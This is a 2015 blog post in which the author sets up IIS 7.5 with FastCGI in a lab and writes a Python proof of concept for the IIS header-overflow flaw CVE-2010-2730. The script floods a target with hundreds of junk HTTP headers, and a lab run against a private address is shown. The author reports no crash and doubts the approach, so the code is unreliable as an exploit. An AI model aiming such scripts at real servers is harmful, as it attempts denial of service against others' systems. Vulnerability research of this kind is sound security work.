Saturday, February 28, 2015

CVE-2010-2730: Microsoft IIS Request Header Buffer Overflow Vulnerability

Writing Proof of Concept based on information available on various sites.
Checkpoint details the Vulnerability as

"The vulnerability is due to a heap buffer overflow error when processing unexpected number of headers in an HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to a target server. Successful exploitation would allow an attacker to inject and execute arbitrary code on the target system with the security privileges of the IIS Worker process."

Configuring FastCGI for IIS 7.5
Browse to
    Control Panel -> Programs and Features 
click "Turn Windows features on or off" and follow the path shown below.
Note: I also tried enabling only CGI and un checking all the other checkboxes given below.


Install Administrator pack for IIS 7.5 after installing the pack click on start and type IIS you will see Internet Information Services (IIS Manager), clicking on it will take you to below window.

Configure FastCGI as shown below

If you feel configuration didn'g go fine you can configure and verify the same using CLI.
appcmd.exe is found at
%windir%\system32\inetsrv\


If FastCGI installation is successful accessing
http://localhost/phpinfo.cgi
should show below page. I created the page phpinfo.php under
C:\Inetpub\wwwroot\
make sure the directory has proper permissions.

Proof of Concept
#!/usr/bin/python

import os, sys
import urllib2

def main(all_args):
    print "in main"
    if len(all_args) != 3:
        print "invalid args"
        print "usage:\n\t%s server_ip_addr http_port"%(all_args[0])
        sys.exit();
    headers = {"Host":all_args[1],
                "Accept": "text/html,application/xhtml+xml,application/xml",
                "Accept-Language": "en-us",
                "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
                "Keep-Alive": "115",
                "Connection": "keep-alive"}

    for k,v in headers.items():
        print (k, v)

    #create junk headers
    print "Creating junk Request Headers"
    for i in range(1,400):
        junk_header = "My-Name" + str(i)
        value = "Praveen Darshanam" + str(i)
        headers.update({junk_header: value})

    url = "http://" + all_args[1] + ":" + all_args[2] + "/phpinfo.php"
    #url = "http://" + all_args[1] + "/info.php"
    print "url: " + url
    #data = "From Praveen Darshanam"
    #req = urllib2.Request(url, data, headers)
    req = urllib2.Request(url, None, headers)
    response = urllib2.urlopen(req)
    print "Response Length =" + str(len(response.read()))

if __name__ == "__main__":
    print "sys.argv=" + str(sys.argv)
    main(sys.argv)

Usage
./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py server_ip_addr http_port
praveend@praveend-VirtualBox:~$
$ ./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py 192.168.56.110 80
sys.argv=['./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py', '192.168.56.110', '80']
in main
('Accept-Language', 'en-us')
('Connection', 'keep-alive')
('Accept', 'text/html,application/xhtml+xml,application/xml')
('Keep-Alive', '115')
('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
('Host', '192.168.56.110')
Creating junk Request Headers
url: http://192.168.56.110:80/phpinfo.php
Response Length =119639

Exploit Traffic


I didn't see any crash after sending multiple fake headers, not sure if I interpreted the Vulnerability in correct manner.

References
https://technet.microsoft.com/en-us/library/dd239230(v=ws.10).aspx
http://www.iis.net/configreference/system.webserver/fastcgi
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2730
http://www.checkpoint.com/defense/advisories/public/2013/cpai-03-dec2.html
http://www.juniper.net/security/auto/vulnerabilities/vuln4476.html
https://technet.microsoft.com/library/security/ms10-065